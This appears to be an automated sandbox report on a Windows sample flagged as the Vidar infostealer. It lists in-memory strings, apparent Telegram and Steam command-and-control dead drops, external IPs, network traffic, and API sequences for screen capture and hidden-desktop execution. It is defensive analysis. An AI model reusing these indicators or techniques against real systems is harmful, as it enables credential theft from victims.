Source: dwpk5JGAxF.exe, 00000000.00000002.1823395931.000000000A700000.00000004.00001000.00020000.00000000.sdmp, dwpk5JGAxF.exe, 00000000.00000002.1820717770.000000000A542000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.2314231363.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199828130190
Source: BitLockerToGo.exe, 00000003.00000002.2314231363.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199828130190ot0yikamMozilla/5.0
Source: BitLockerToGo.exe, 00000003.00000002.2319643246.000000000598A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BitLockerToGo.exe, 00000003.00000002.2319643246.000000000598A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.00000000029E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: dwpk5JGAxF.exe, 00000000.00000002.1823395931.000000000A700000.00000004.00001000.00020000.00000000.sdmp, dwpk5JGAxF.exe, 00000000.00000002.1820717770.000000000A542000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A43000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1836281972.0000000002A4E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1836281972.0000000002A55000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1836281972.0000000002A5B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2314231363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A28000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2314637290.00000000029E8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1836261581.0000000002A95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/g02f04
Source: BitLockerToGo.exe, 00000003.00000002.2314231363.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/g02f04ot0yikamMozilla/5.0
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.00000000029E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/h
Source: chrome.exe, 00000007.00000002.2025977188.000051E002BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000007.00000002.2020934104.000051E0023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tasks.googleapis.com/
Source: BitLockerToGo.exe, 00000003.00000003.1836281972.0000000002A5B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A28000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1836261581.0000000002A95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: chromecache_437.9.dr	String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: BitLockerToGo.exe, 00000003.00000002.2315855967.000000000516F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2318678012.000000000576D000.00000004.00000020.00020000.00000000.sdmp, qiekno.3.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: BitLockerToGo.exe, 00000003.00000002.2315855967.00000000051AC000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025084933.000051E0029E0000.00000004.00000800.00020000.00000000.sdmp, gl68gd.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000007.00000002.2026913697.000051E002DE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000007.00000002.2026913697.000051E002DE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000007.00000002.2026913697.000051E002DE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000007.00000003.1959579225.000051E0024A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 00000007.00000002.2029147033.000051E0032F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000007.00000003.1959579225.000051E0024A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000007.00000003.1947177679.000051E002FE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000007.00000002.2025084933.000051E0029E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/CharEl3
Source: chrome.exe, 00000007.00000002.2026845676.000051E002DB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/CharQ
Source: chrome.exe, 00000007.00000002.2029079643.000051E0032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000007.00000002.2029384362.000051E003370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: chrome.exe, 00000007.00000002.2020934104.000051E0023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029046475.000051E003270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025755406.000051E002B60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025250001.000051E002A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000007.00000002.2020934104.000051E0023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029046475.000051E003270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025755406.000051E002B60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025250001.000051E002A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: BitLockerToGo.exe, 00000003.00000002.2315855967.00000000051AC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2317036639.00000000054B8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2023188496.000051E002700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027033597.000051E002E14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024514018.000051E002920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2023526862.000051E0027C4000.00000004.00000800.00020000.00000000.sdmp, gl68gd.3.dr, 9rieus.3.dr, Web Data.12.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000007.00000002.2022816639.000051E002678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1971305344.000051E003D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1972346702.000051E003D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1971948126.000051E0034C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 00000007.00000003.1971772953.000051E003CD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000007.00000003.1958345065.000051E0025B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000007.00000002.2023043213.000051E0026D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000007.00000002.2026144999.000051E002C38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000007.00000003.1959579225.000051E0024A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 00000007.00000002.2019213351.000051E00221C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chromecache_437.9.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_437.9.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chrome.exe, 00000007.00000003.1978963138.000051E003B3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000007.00000002.2029147033.000051E0032F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000007.00000002.2029147033.000051E0032F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 00000007.00000002.2023043213.000051E0026D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000007.00000003.1971948126.000051E0034C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000007.00000003.1972039758.000051E003C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1971547895.000051E003CFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1971821538.000051E003CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1972346702.000051E003D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2031019906.000051E003CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1971948126.000051E0034C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000007.00000003.1971772953.000051E003CD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.ewNYOTtoM3M.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000007.00000003.1971772953.000051E003CD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.D8RxnyMyyQs.L.W.O/m=qmd
Source: BitLockerToGo.exe, 00000003.00000002.2315855967.000000000516F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2318678012.000000000576D000.00000004.00000020.00020000.00000000.sdmp, qiekno.3.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: BitLockerToGo.exe, 00000003.00000002.2319643246.000000000598A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: BitLockerToGo.exe, 00000003.00000002.2319643246.000000000598A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: BitLockerToGo.exe, 00000003.00000002.2319643246.000000000598A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: BitLockerToGo.exe, 00000003.00000002.2319643246.000000000598A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000007.00000003.1971948126.000051E00351C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1973797443.000051E00351C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1981181567.000051E00351C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2026280108.000051E002C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029580719.000051E00351C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029147033.000051E0032F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000007.00000003.1971948126.000051E00351C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytcaogl
Source: chrome.exe, 00000007.00000003.1973797443.000051E00351C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1981181567.000051E00351C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029580719.000051E00351C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytcaoglQ
Source: chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/Q
Source: chrome.exe, 00000007.00000002.2021906339.000051E0024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2026771530.000051E002D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2028984895.000051E003248000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027508814.000051E002F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029448819.000051E0033DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: chrome.exe, 00000007.00000002.2029448819.000051E0033DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlaultQ
Source: chrome.exe, 00000007.00000002.2027508814.000051E002F4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt
Source: chrome.exe, 00000007.00000002.2028984895.000051E003248000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlr

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.130.190.206:443 -> 192.168.2.8:49708 version: TLS 1.2

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 3_2_0040EAB5 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

3_2_0040EAB5

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 3_2_00405AD3 memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,CreateProcessA,Sleep,CloseDesktop,

3_2_00405AD3

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.dwpk5JGAxF.exe.a680000.2.unpack, type: UNPACKEDPE	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 0.2.dwpk5JGAxF.exe.a700000.1.unpack, type: UNPACKEDPE	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 3.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
